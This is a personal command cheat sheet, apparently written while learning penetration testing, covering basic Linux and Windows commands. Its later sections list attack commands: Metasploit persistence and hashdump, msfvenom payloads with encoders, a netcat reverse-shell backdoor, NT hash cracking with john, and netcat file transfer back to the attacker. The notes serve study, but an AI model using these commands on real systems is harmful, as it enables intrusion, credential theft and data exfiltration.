Basics Cheat Sheet
Here is a formatted list of basic commands. I used these as I was learning how to get my way around and added to the list as I learned new things. Writing them down helped me remember the syntax.
Get Help … and other info
C:\> <command> /?
root@kl~# <command> -h
root@kl~# <command> --help
root@kl~# man <command>
root@kl~# apropos
root@kl~# history
root@kl~# hostname
root@kl~# sudo
root@kl~# whoami
- (print current user id and name)
root@kl~# date
C:\> chdir
- (displays location)
root@kl~# pwd
- (displays location)
Processes and Things
root@kl~# jobs
- (list cronjobs)
root@kl~# kill
- (stop processes)
root@kl~# pkill
- (stop processes)
root@kl~# ps –aef
- (list processes status)
C:\ tasklist
Files
root@kl~# cp <src> <dst>
- (copy)
C:\> copy <src> <dst>
root@kl~# clear
C:\> cls
C:\> dir
root@kl~# echo <message>
- (print to screen)
root@kl~# find –iname <file>
C:\> findstr /i /s <string> *.txt
- (like grep for Windows)
root@kl~# file
- (determine file type)
C:\> dir \ <file> /b /s
root@kl~# grep
- (search files for matching text)
root@kl~# gzip
- (compress or decompress files)
root@kl~# less
- (display output one screen at a time)
root@kl~# locate
root@kl~# ls
root@kl~# mkdir
- (new directory)
root@kl~# mv <src> <dst>
- (move/rename a file)
C:\> move <src> <dst>
root@kl~# rm
- (remove files)
C:\> ren
- (renames file)
root@kl~# umask
- (users file creation mask)
root@kl~# uniq
- (uniquify files)
root@kl~# vi/vim
- (the best text editor)
root@kl~# wc
- (print byte, word and line counts)
root@kl~# whereis
- (search $path, man pages and source files for program)
Users
root@kl~# chgrp
- (change group ownership)
root@kl~# chmod
- (change access permissions)
root@kl~# chown
- (change file owner and group)
root@kl~# groupadd
- (add a user to a security group)
root@kl~# passwd
- (modify user password)
root@kl~# useradd
- (create new users)
root@kl~# usermod
- (modify user account)
root@kl~# users
- (list logged in users)
Networks
root@kl~# curl
- (grab webpages)
root@kl~# dig
- (DNS lookup)
root@kl~# ifconfig
root@kl~# netstat -ano/-plant/-uplant
- (networking connections)
root@kl~# nslookup
- (query name servers)
root@kl~# ping
root@kl~# ssh
root@kl~# traceroute
root@kl~# wget
- (get web pages or files)
Reconnaissance
nslookup <domain>
- Discover target’s IP/FQDN domain
nslookup <ip>
root@kl~# dig <domain>
- Find nameserver for known domain
root@kl~# dig axfr @<name server> <domain>
- perform a zone transfer to list hosts w/in domain
root@kl~# traceroute <ip>
- determine route to a host
C:\> tracert <ip>
- determine route to a host
root@kl~# nmap –sV –O <ip>
- scan for services and operating system
root@kl~# nmap --script=vulns <ip>
- scan for some old vulns
Gain and Maintain
root@kl~# ssh <user>@<ip>
- establish ssh connection
rdesktop -u <username> -p <password> <ip>
vncviewer <ip>
- remote desktop (rdesktop is port 3389 and vncviewer is 5900)
- favorites from the msf console
search <keyword>
info <module>
use <module>
show options
(shows you what to fill in)show payloads
(shows payloads associated with the exploit you loaded)background
(use to background sessions)pwd vs lpwd & cd vs lcd
sessions –i <#>
(to interact with sessions)run persistence –h
run persistence –A –r <your ip> -p <port> -i 10
(call back every 10 seconds if connection is lost)hashdump
- add a route in msf
route add <victim subnet> <subnet mask> <session#>
route print
- make a msfvenom payload for windows executable
root@kl~# msfvenom –p <payload> lhost=<ip> lport=<port> -f exe –i 2 > <file>.exe
root@kl~# msfvenom –l encoders
(for list of encoders)- set up a listener in metasploit
use exploit/multi/handler
set payload
set ExitOnSession false
exploit –j (run as a job)
- netcat backdoor
root@kl~# nc –l –p <port> (on launch platform)
C:\> start nc <launch ip> <port> -e cmd.exe
Escalate and Propagate
- get passwords using meterpreter or shell (/etc/shadow or hashdump)
- use john to crack NT hashes – remember to add special words you find to the password list in john
root@kl~# ./john <file> --format=nt
- transfer files with netcat
root@kl~# nc –l –p <port> > <file>
(on your platform to listen for file)C:\> nc.exe <your ip> <port> < <file to transfer>
- transfer files with python
python –m SimpleHTTPServer <port>